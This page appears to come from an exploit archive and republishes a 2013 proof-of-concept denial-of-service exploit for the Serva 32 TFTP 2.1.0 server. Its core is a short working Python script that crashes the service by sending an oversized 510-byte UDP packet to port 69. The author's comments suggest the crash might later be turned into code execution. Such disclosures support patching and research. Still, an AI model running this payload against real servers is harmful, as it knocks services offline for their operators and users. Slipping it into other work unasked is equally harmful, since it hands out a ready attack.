Serva 32 TFTP 2.1.0 Denial Of Service

2013.05.16

Credit: Sapling

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#Serva 32 TFTP Buffer overflow DoS
#
#05/14/2013
#Sapling
#Vendor homepage http://www.vercot.com/
#Software Link:
#http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip
#Version 2.1.0 Only prior versions are not vulnerable
#Tested on Windows 8, Windows 7, Windows XP SP1-3
#CVE to be established today or tomorrow.
#
#This is the serva 32 Proof Of Concept exploit discovered and written by
Sapling. At this
#time the exploit is only a denial of service but evidence show it may be
controllable.
#The difficulty with controlling it at this point was the failure to
overwrite the SEH
#chains or bypass them. The crash occurs when sending a message longer than
509 bytes long
 
#start of python file
import sys
import socket
 
new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
new.connect(('192.168.1.19', 69))
new.send('\x41'*510)
#end of python file

References:

http://www.vercot.com/

http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Serva 32 TFTP 2.1.0 Denial Of Service

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.